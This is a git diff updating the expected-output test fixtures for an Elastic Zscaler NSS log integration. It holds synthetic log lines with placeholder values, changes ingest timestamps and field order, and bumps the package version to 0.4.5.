2019^^timezone=ET^^action=Allowed^^reason=unknown^^hostname=oremeum4231.internal.host^^protocol=ipv6^^serverip=10.139.90.218^^url=https://www5.example.org/liquipe/rehe.gif?niamqu=uioffi#suntin^^urlcategory=consequa^^urlclass=tionu^^dlpdictionaries=umqua^^dlpengine=ommod^^filetype=ione^^threatcategory=mnihi^^threatclass=rrorsi^^pagerisk=icons^^threatname=voluptat^^clientpublicIP=volu^^ClientIP=10.131.81.172^^location=llamcor^^refererURL=https://mail.example.com/veri/run.txt?enimadm=empo#apa^^useragent=Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30^^department=icons^^user=hende^^event_id=umdol^^clienttranstime=Sedutper^^requestmethod=exe^^requestsize=6188^^requestversion=preh^^status=dol^^responsesize=3128^^responseversion=gnamal^^transactionsize=6119", "event": 
{ - "ingested": "2021-06-14T08:26:19.845262400Z" + "ingested": "2021-12-14T14:59:54.590759163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utodit ZSCALERNSS: time=cer Nov 1 10:16:48 2019^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=ueip6097.api.host^^protocol=tcp^^serverip=10.128.43.71^^url=https://www.example.org/erit/asiarch.gif?tdolor=oremagna#siuta^^urlcategory=amnihil^^urlclass=nderit^^dlpdictionaries=ficia^^dlpengine=tru^^filetype=tionu^^threatcategory=natuser^^threatclass=olupt^^pagerisk=eprehe^^threatname=eetd^^clientpublicIP=tiumdo^^ClientIP=10.152.217.174^^location=litse^^refererURL=https://internal.example.com/nde/tNequepo.txt?end=ineavolu#ptate^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=nderitin^^user=mquiado^^event_id=ssequa^^clienttranstime=nisist^^requestmethod=temvele^^requestsize=7350^^requestversion=xeaco^^status=urm^^responsesize=114^^responseversion=porincid^^transactionsize=1150", "event": { - "ingested": "2021-06-14T08:26:19.845273500Z" + "ingested": "2021-12-14T14:59:54.590759626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pici ZSCALERNSS: time=erit Nov 15 5:19:22 2019^^timezone=PT^^action=Blocked^^reason=success^^hostname=fugiatqu7793.www.localdomain^^protocol=ipv6-icmp^^serverip=10.26.149.221^^url=https://mail.example.org/maven/tectob.jpg?litsedd=mnis#ainci^^urlcategory=aturve^^urlclass=tiumdol^^dlpdictionaries=mporain^^dlpengine=secte^^filetype=dut^^threatcategory=aecons^^threatclass=tionemu^^pagerisk=edictasu^^threatname=quipexea^^clientpublicIP=orsit^^ClientIP=10.217.193.148^^location=tametco^^refererURL=https://api.example.com/lit/laborio.gif?mfug=acommod#mid^^useragent=Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36^^department=oloremag^^user=uisa^^event_id=umquidol^^clienttranstime=isiutali^^requestmethod=rehe^^requestsize=3382^^requestversion=adminima^^status=ipex^^responsesize=1046^^responseversion=sitvolup^^transactionsize=387", "event": { - "ingested": "2021-06-14T08:26:19.845281500Z" + "ingested": "2021-12-14T14:59:54.590760012Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnamali ZSCALERNSS: time=ali Nov 30 12:21:57 2019^^timezone=CET^^action=Blocked^^reason=unknown^^hostname=onsequ3168.www.corp^^protocol=icmp^^serverip=10.109.192.53^^url=https://www.example.com/siarch/oloremi.htm?one=iduntutl#tNe^^urlcategory=scive^^urlclass=tcupi^^dlpdictionaries=essequam^^dlpengine=destla^^filetype=oluptat^^threatcategory=ita^^threatclass=temUte^^pagerisk=idest^^threatname=ostru^^clientpublicIP=ptassit^^ClientIP=10.172.17.6^^location=samvolup^^refererURL=https://www5.example.org/taspe/empori.txt?emporain=ovo#aeabillo^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=boriosa^^user=eprehen^^event_id=rehen^^clienttranstime=sitasp^^requestmethod=tassit^^requestsize=212^^requestversion=teir^^status=suntin^^responsesize=4053^^responseversion=upta^^transactionsize=1487", "event": { - "ingested": "2021-06-14T08:26:19.845292500Z" + "ingested": "2021-12-14T14:59:54.590760419Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onevol ZSCALERNSS: time=llamco Dec 14 7:24:31 
2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=oremquel3120.internal.localhost^^protocol=ggp^^serverip=10.119.106.108^^url=https://mail.example.com/ostr/liqu.txt?niam=mullamc#umtota^^urlcategory=ssecil^^urlclass=xplic^^dlpdictionaries=isn^^dlpengine=quepor^^filetype=Lor^^threatcategory=ten^^threatclass=exeacomm^^pagerisk=cusan^^threatname=oquisq^^clientpublicIP=olli^^ClientIP=10.135.38.213^^location=tiset^^refererURL=https://mail.example.net/erspici/xercitat.jpg?Exce=uae#tut^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61^^department=ser^^user=ore^^event_id=iatisund^^clienttranstime=ritquii^^requestmethod=volup^^requestsize=1902^^requestversion=orsi^^status=ull^^responsesize=391^^responseversion=dolorsi^^transactionsize=7745", "event": { - "ingested": "2021-06-14T08:26:19.845299800Z" + "ingested": "2021-12-14T14:59:54.590760809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json index 1388caf7341..59a14d4009f 100644 --- a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json +++ b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json 
@@ -1,12 +1,12 @@
{ "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "hello ZSCALERNSS: time=WOOT Jun 23 15:16:42 2017^^timezone=CEST^^action=\u003caction\u003e^^reason=\u003cresult\u003e^^hostname=\u003chostname\u003e^^protocol=\u003cprotocol\u003e^^serverip=\u003cdaddr\u003e^^url=\u003curl\u003e^^urlcategory=\u003cfilter\u003e^^urlclass=\u003cinfo\u003e^^dlpdictionaries=\u003cfld3\u003e^^dlpengine=\u003cfld4\u003e^^filetype=\u003cfiletype\u003e^^threatcategory=\u003ccategory\u003e^^threatclass=\u003cvendor_event_cat\u003e^^pagerisk=\u003cfld8\u003e^^threatname=\u003cthreat_name\u003e^^clientpublicIP=\u003cfld9\u003e^^ClientIP=\u003csaddr\u003e^^location=\u003cfld11\u003e^^refererURL=\u003cweb_referer\u003e^^useragent=\u003cuser_agent\u003e^^department=\u003cuser_dept\u003e^^user=\u003cusername\u003e^^event_id=\u003cid\u003e^^clienttranstime=\u003cfld17\u003e^^requestmethod=\u003cweb_method\u003e^^requestsize=\u003csbytes\u003e^^requestversion=\u003cfld20\u003e^^status=\u003cresultcode\u003e^^responsesize=\u003crbytes\u003e^^responseversion=\u003cfld23\u003e^^transactionsize=\u003cbytes\u003e", "event": { - "ingested": "2021-06-14T08:26:20.438011500Z" + "ingested": "2021-12-14T14:59:56.254697507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/zscaler/manifest.yml b/packages/zscaler/manifest.yml
index ece330f8aa8..4a3e4ceb6c0 100644
--- a/packages/zscaler/manifest.yml
+++ b/packages/zscaler/manifest.yml
@@ -1,7 +1,7 @@
format_version: 1.0.0
name: zscaler
title: Zscaler NSS Logs
-version: 0.4.4
+version: 0.4.5
description: Collect and parse logs from Zscaler devices with Elastic Agent.
categories: ["network", "security"]
release: experimental